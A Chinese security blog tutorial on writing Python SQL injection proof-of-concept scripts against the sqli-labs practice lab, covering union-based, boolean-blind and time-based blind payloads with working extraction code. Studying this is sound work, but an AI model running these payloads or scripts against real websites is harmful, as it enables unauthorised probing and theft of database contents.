<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.0.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"aqyoung.github.io","root":"/","scheme":"Muse","version":"7.7.2","exturl":false,"sidebar":{"position":"right","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":true,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="SQL POC的编写（基于sqli-labs）">
<meta name="keywords" content="POC">
<meta property="og:type" content="article">
<meta property="og:title" content="想批量刷洞？看一下POC怎么编写">
<meta property="og:url" content="https:&#x2F;&#x2F;aqyoung.github.io&#x2F;2020&#x2F;04&#x2F;30&#x2F;%E6%83%B3%E6%89%B9%E9%87%8F%E5%88%B7%E6%B4%9E%EF%BC%8C%E7%9C%8B%E4%B8%80%E4%B8%8BPOC%E6%80%8E%E4%B9%88%E7%BC%96%E5%86%99&#x2F;index.html">
<meta property="og:site_name" content="AqYoung">
<meta property="og:description" content="SQL POC的编写（基于sqli-labs）">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="https:&#x2F;&#x2F;aqyoung.github.io&#x2F;images&#x2F;SqlPoc&#x2F;sql.png">
<meta property="og:image" content="https:&#x2F;&#x2F;aqyoung.github.io&#x2F;images&#x2F;SqlPoc&#x2F;sql1.png">
<meta property="og:image" content="https:&#x2F;&#x2F;aqyoung.github.io&#x2F;images&#x2F;SqlPoc&#x2F;sql2.png">
<meta property="og:image" content="https:&#x2F;&#x2F;aqyoung.github.io&#x2F;images&#x2F;SqlPoc&#x2F;sql3.png">
<meta property="og:image" content="https:&#x2F;&#x2F;aqyoung.github.io&#x2F;images&#x2F;SqlPoc&#x2F;sql4.png">
<meta property="og:image" content="https:&#x2F;&#x2F;aqyoung.github.io&#x2F;images&#x2F;SqlPoc&#x2F;sql5.png">
<meta property="og:image" content="https:&#x2F;&#x2F;aqyoung.github.io&#x2F;images&#x2F;SqlPoc&#x2F;sql6.png">
<meta property="og:image" content="https:&#x2F;&#x2F;aqyoung.github.io&#x2F;images&#x2F;SqlPoc&#x2F;sql7.png">
<meta property="og:image" content="https:&#x2F;&#x2F;aqyoung.github.io&#x2F;images&#x2F;SqlPoc&#x2F;sql8.png">
<meta property="og:updated_time" content="2020-04-30T11:04:22.819Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https:&#x2F;&#x2F;aqyoung.github.io&#x2F;images&#x2F;SqlPoc&#x2F;sql.png">

<link rel="canonical" href="https://aqyoung.github.io/2020/04/30/%E6%83%B3%E6%89%B9%E9%87%8F%E5%88%B7%E6%B4%9E%EF%BC%8C%E7%9C%8B%E4%B8%80%E4%B8%8BPOC%E6%80%8E%E4%B9%88%E7%BC%96%E5%86%99/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>想批量刷洞？看一下POC怎么编写 | AqYoung</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">AqYoung</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">分享渗透知识与技巧</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-fw fa-user"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-fw fa-th"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocorrect="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://aqyoung.github.io/2020/04/30/%E6%83%B3%E6%89%B9%E9%87%8F%E5%88%B7%E6%B4%9E%EF%BC%8C%E7%9C%8B%E4%B8%80%E4%B8%8BPOC%E6%80%8E%E4%B9%88%E7%BC%96%E5%86%99/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.png">
      <meta itemprop="name" content="AqYoung">
      <meta itemprop="description" content="努力将一切"Regular attacks"工程化！">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="AqYoung">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          想批量刷洞？看一下POC怎么编写
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2020-04-30 18:44:38 / 修改时间：19:04:22" itemprop="dateCreated datePublished" datetime="2020-04-30T18:44:38+08:00">2020-04-30</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Python/" itemprop="url" rel="index"><span itemprop="name">Python</span></a>
                </span>
            </span>

          
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="fa fa-comment-o"></i>
      </span>
      <span class="post-meta-item-text">Valine：</span>
    
    <a title="valine" href="/2020/04/30/%E6%83%B3%E6%89%B9%E9%87%8F%E5%88%B7%E6%B4%9E%EF%BC%8C%E7%9C%8B%E4%B8%80%E4%B8%8BPOC%E6%80%8E%E4%B9%88%E7%BC%96%E5%86%99/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2020/04/30/%E6%83%B3%E6%89%B9%E9%87%8F%E5%88%B7%E6%B4%9E%EF%BC%8C%E7%9C%8B%E4%B8%80%E4%B8%8BPOC%E6%80%8E%E4%B9%88%E7%BC%96%E5%86%99/" itemprop="commentCount"></span>
    </a>
  </span>
  
  

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>SQL POC的编写（基于sqli-labs）<a id="more"></a></p>
<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>什么是POC？</p>
<p>POC（Proof of Concept）在黑客圈特指：观点验证程序，即用来验证某个漏洞是否存在。</p>
<p>在现实的应用当中，如果我发现了某个新漏洞，那么我就可以通过POC批量检测。POC的编写的关键并不在于程序本身，而在于漏洞的理解。所以，我下面以sqli-labs为例，用Python编写较为几个常见的SQL POC</p>
<h1 id="POC编写"><a href="#POC编写" class="headerlink" title="POC编写"></a>POC编写</h1><h2 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h2><p>在这里我为了图方便所以直接用docker进行搭建</p>
<pre><code># 拉取docker images
docker pull acgpiano/sqli-labs
# 以后台模式运行并且映射80端口
docker run -id --name sqli-labs -p 80:80 acgpiano/sqli-labs
# 进入sqli-labs里面的系统
docker exec -it sqli-labs2 bash</code></pre><p>补充:</p>
<p><strong>SQL注入分类</strong>的思维导图，大体可以分为以下几类：</p>
<p><img src="/images/SqlPoc/sql.png" alt=""></p>
<h2 id="基于报错的-SQL-注入-PoC-编写"><a href="#基于报错的-SQL-注入-PoC-编写" class="headerlink" title="基于报错的 SQL 注入 PoC 编写"></a>基于报错的 SQL 注入 PoC 编写</h2><h3 id="漏洞分析："><a href="#漏洞分析：" class="headerlink" title="漏洞分析："></a>漏洞分析：</h3><p>payload: </p>
<pre><code>http://192.168.11.15/Less-1/index.php?id=-1&apos; union select 1,2,md5(88) --+</code></pre><p><img src="/images/SqlPoc/sql1.png" alt=""></p>
<p>这里使用union联合查询，通过mysql里面的md5()函数计算出88的md5值，并且通过内容返回该值。</p>
<p>那么这样的话，POC的编写思路就很清晰了：通过判断是否返回对应数据md5的计算来判断是否执行md5()函数，如果执行，那么漏洞存在。</p>
<h3 id="下面附上POC代码："><a href="#下面附上POC代码：" class="headerlink" title="下面附上POC代码："></a>下面附上POC代码：</h3><pre><code>#!/usr/bin/env python
# -*- coding:utf-8 -*-
# @Time : 2020/4/28 14:55
# @Author : AqYoung
# @File : sql1.py

import requests
import random
import hashlib


def verify(url):
    rand_num = random.randint(0, 1000)
    hash_flag = hashlib.md5(str(rand_num).encode(encoding=&apos;utf-8&apos;)).hexdigest()
    target = &quot;{domain}/Less-1/index.php?id=-1%27 union select 1,2,md5({rand_num}) %23&quot;.format(domain=url, rand_num=rand_num)

    try:
        res = requests.get(url=target, timeout=20)
        result = res.content.decode(encoding=&apos;utf-8&apos;)
        # 判断result返回内容是否有hash_flag
        if hash_flag in result:
            print(&quot;{domain} is vulnerable target &quot;.format(domain=url))
        else:
            print(&quot;{domain} not is vulnerable target &quot;.format(domain=url))

    except Exception as e:
        print(&quot;Maybe something went wrong...&quot;)
        print(e)


if __name__ == &apos;__main__&apos;:
    verify(&quot;http://192.168.11.15&quot;)</code></pre><p>参数说明：</p>
<pre><code>rand_num    从0,1000中取一个随机数
hash_flag     通过hashlib计算hash值，用来和页面返回的hash值进行比较是否相等</code></pre><p>执行效果：</p>
<p><img src="/images/SqlPoc/sql2.png" alt=""></p>
<h2 id="基于布尔的盲注的-SQL-注入-PoC-编写"><a href="#基于布尔的盲注的-SQL-注入-PoC-编写" class="headerlink" title="基于布尔的盲注的 SQL 注入 PoC 编写"></a>基于布尔的盲注的 SQL 注入 PoC 编写</h2><h3 id="漏洞分析：-1"><a href="#漏洞分析：-1" class="headerlink" title="漏洞分析："></a>漏洞分析：</h3><p>首先，先登录    mysql，查看一下对应的信息；</p>
<p><img src="/images/SqlPoc/sql3.png" alt=""></p>
<p>函数说明：</p>
<pre><code># 1 mid()/substr()用来截取字符串。
比如：
select mid(database(),n,m);
其中n表示从第几位开始截取，m表示要截取几位。
# ord()/ascii()把对应的字符串转化为ascii值</code></pre><p>ASCII Table ：<br><img src="/images/SqlPoc/sql4.png" alt=""></p>
<p>通过上面的理解，我们就可以构建对应的payload</p>
<p>payload：</p>
<pre><code>http://192.168.11.15/Less-8/?id=1&apos; and ord(mid(version(),1,8))&lt;=115--+</code></pre><p><img src="/images/SqlPoc/sql5.png" alt=""><br><img src="/images/SqlPoc/sql6.png" alt=""></p>
<p>由于我们数据库的ascii值为115，所以判断是否&lt;=115,返回”You are in”但是114的话则不返回。</p>
<h3 id="下面附上POC代码：-1"><a href="#下面附上POC代码：-1" class="headerlink" title="下面附上POC代码："></a>下面附上POC代码：</h3><pre><code>#!/usr/bin/env python
# -*- coding:utf-8 -*-
# @Time : 2020/4/28 20:20
# @Author : AqYoung
# @File : sql8.py

import requests

host = &quot;http://192.168.11.15/Less-8/?id=1&quot;

# 根据是否存在&quot;You ar in&quot;，从而返回True或者False
def html_bool(bool_sql):
    url = host + &quot;%27%20and%20&quot; + bool_sql + &quot;%20--+&quot;
    # print(url)
    html = requests.get(url=url).content.decode(encoding=&apos;utf-8&apos;)
    if &quot;You are in&quot; in html:
        return True
    else:
        return False


def dichotomy():
    global data
    data = &apos;&apos;
    # 用二分法获取数据库的长度，并且传值给j参数
    low = 0
    height = 128
    j = 0
    mid = &apos;&apos;
    while True:
        mid = int((low + height) / 2)
        bool_sql = &quot;length(database())&lt;={mid}&quot;.format(mid=mid)
        if mid == low:
            j = int(mid+1)
            print(&quot;数据库的长度为:{length}\n请等待...&quot;.format(length=j-1))
            break
        elif html_bool(bool_sql=bool_sql):
            height = mid
        else:
            low = mid

    # 用二分法来获取数据库的名称
    for i in range(1, j):
        low = 0
        height = 128
        mid = &apos;&apos;
        while True:
            mid = int((low + height) / 2)
            bool_sql = &quot;ord(mid(database(),{i},29))&lt;={mid}&quot;.format(i=i, mid=mid)
            if mid == low:
                data += data.join(str(chr(mid + 1)))
                break
            elif html_bool(bool_sql=bool_sql):
                height = mid
            else:
                low = mid
    else:
        if len(data) &gt; 0:
            print(&quot;存在漏洞，当前使用的数据库为：{data}&quot;.format(data=data))
        else:
            print(&quot;可能不存在该漏洞&quot;)
if __name__ == &apos;__main__&apos;:
    dichotomy()</code></pre><p>参数说明：</p>
<pre><code>html_bool()    判断是否存You are in从而返回True or False
dichotomy() 简单来讲    第一次用二分法来判断数据库长度，而第二次的for循环里面是获取了对应的数据库名称</code></pre><p>执行效果：</p>
<p><img src="/images/SqlPoc/sql7.png" alt=""></p>
<p>存在漏洞会输出数据库名称，不存则不会返回</p>
<h2 id="基于时间的盲注的-SQL-注入-PoC-编写"><a href="#基于时间的盲注的-SQL-注入-PoC-编写" class="headerlink" title="基于时间的盲注的 SQL 注入 PoC 编写"></a>基于时间的盲注的 SQL 注入 PoC 编写</h2><h3 id="漏洞分析：-2"><a href="#漏洞分析：-2" class="headerlink" title="漏洞分析："></a>漏洞分析：</h3><p>payload1：</p>
<pre><code>http://192.168.11.15/Less-9/index.php?id=1&apos; and If
(ascii(substr(database(),1,1))&gt;1,1,sleep(5))--+</code></pre><p>参数说明：</p>
<pre><code>sleep(n)    #延迟n秒
if(条件，1，sleep(5))    #通过判断前面的条件，如果true执行1，否则执行sleep(5)</code></pre><p>payload2:</p>
<pre><code>http://192.168.11.15/Less-9/index.php?id=1&apos; and If((length(database()))&gt;1,1,sleep(5))--+</code></pre><p>这里用payload2来获取数据库长度，payload2获取数据库名称。</p>
<p>基于时间盲注和基于布尔盲注POC编写的主要区别是在于对于条件的判断<br>所以下面只附上html_bool()</p>
<pre><code>def html_bool(bool_sql):
    url = host + &quot;%27%20and%20&quot; + bool_sql + &quot;%20--+&quot;
    # print(url)
    start = time.time()
    html = requests.get(url=url, timeout=15)
    end = time.time()
    if (end-start) &gt; 5:
        return True
    else:
        return False

#dichotomy()中的bool_sql可以根据上面的两个payload修改即可。</code></pre><p>执行效果：</p>
<p><img src="/images/SqlPoc/sql8.png" alt=""></p>
<p>存在漏洞则输出，数据库长度和名称</p>
<h1 id="尾巴："><a href="#尾巴：" class="headerlink" title="尾巴："></a>尾巴：</h1><p>这篇文章传达的信息十分有限，所以简单的介绍了几个常用的SQL POC编写，而且并没有基于框架编写，你可以使用Pocsuite、Bugscan、Tangscan等常见的POC框架编写或者自己写一个框架都可以。</p>
<p>然后一些POC你也可以参考<a href="https://www.seebug.org/appdir/" target="_blank" rel="noopener">seebug</a>等。希望对你有帮助。</p>
<hr>
<p><strong>声明：</strong></p>
<ul>
<li>笔者初衷用于分享与交流网络知识，若读者因此作出任何危害网络安全行为后果自负，与作者无关！</li>
</ul>

    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>AqYoung
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="https://aqyoung.github.io/2020/04/30/%E6%83%B3%E6%89%B9%E9%87%8F%E5%88%B7%E6%B4%9E%EF%BC%8C%E7%9C%8B%E4%B8%80%E4%B8%8BPOC%E6%80%8E%E4%B9%88%E7%BC%96%E5%86%99/" title="想批量刷洞？看一下POC怎么编写">https://aqyoung.github.io/2020/04/30/想批量刷洞，看一下POC怎么编写/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-nd/4.0/" rel="noopener" target="_blank"><i class="fa fa-fw fa-creative-commons"></i>BY-NC-ND</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/POC/" rel="tag"># POC</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/04/16/%E4%B8%AD%E9%97%B4%E4%BB%B6%E6%BC%8F%E6%B4%9E%E4%B9%8BJBoss/" rel="prev" title="中间件漏洞之JBoss">
      <i class="fa fa-chevron-left"></i> 中间件漏洞之JBoss
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/04/30/netcat1/" rel="next" title="socket之编写netcat（python3）">
      socket之编写netcat（python3） <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          
    <div class="comments" id="valine-comments"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#前言"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#POC编写"><span class="nav-number">2.</span> <span class="nav-text">POC编写</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#环境搭建"><span class="nav-number">2.1.</span> <span class="nav-text">环境搭建</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#基于报错的-SQL-注入-PoC-编写"><span class="nav-number">2.2.</span> <span class="nav-text">基于报错的 SQL 注入 PoC 编写</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#漏洞分析："><span class="nav-number">2.2.1.</span> <span class="nav-text">漏洞分析：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#下面附上POC代码："><span class="nav-number">2.2.2.</span> <span class="nav-text">下面附上POC代码：</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#基于布尔的盲注的-SQL-注入-PoC-编写"><span class="nav-number">2.3.</span> <span class="nav-text">基于布尔的盲注的 SQL 注入 PoC 编写</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#漏洞分析：-1"><span class="nav-number">2.3.1.</span> <span class="nav-text">漏洞分析：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#下面附上POC代码：-1"><span class="nav-number">2.3.2.</span> <span class="nav-text">下面附上POC代码：</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#基于时间的盲注的-SQL-注入-PoC-编写"><span class="nav-number">2.4.</span> <span class="nav-text">基于时间的盲注的 SQL 注入 PoC 编写</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#漏洞分析：-2"><span class="nav-number">2.4.1.</span> <span class="nav-text">漏洞分析：</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#尾巴："><span class="nav-number">3.</span> <span class="nav-text">尾巴：</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="AqYoung"
      src="/images/avatar.png">
  <p class="site-author-name" itemprop="name">AqYoung</p>
  <div class="site-description" itemprop="description">努力将一切"Regular attacks"工程化！</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">17</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">12</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="cc-license motion-element" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-nd/4.0/" class="cc-opacity" rel="noopener" target="_blank"><img src="/images/cc-by-nc-nd.svg" alt="Creative Commons"></a>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">AqYoung</span>
</div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script>
  <script src="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>
<script src="/js/utils.js"></script><script src="/js/motion.js"></script>
<script src="/js/schemes/muse.js"></script>
<script src="/js/next-boot.js"></script>



  




  <script src="/js/local-search.js"></script>












  

  

<script>
NexT.utils.loadComments(document.querySelector('#valine-comments'), () => {
  NexT.utils.getScript('//unpkg.com/valine/dist/Valine.min.js', () => {
    var GUEST = ['nick', 'mail', 'link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item => {
      return GUEST.includes(item);
    });
    new Valine({
      el         : '#valine-comments',
      verify     : false,
      notify     : true,
      appId      : 'QWm74uHDCgmhInHfKwyFBod1-gzGzoHsz',
      appKey     : '1ktt74cyVPPjTy4P28nMIH2V',
      placeholder: "Just go go （记得在上面留下昵称和邮箱，方便回复！）",
      avatar     : 'mm',
      meta       : guest,
      pageSize   : '5' || 10,
      visitor    : false,
      lang       : '' || 'zh-cn',
      path       : location.pathname,
      recordIP   : false,
      serverURLs : ''
    });
  }, window.Valine);
});
</script>

</body>
</html>
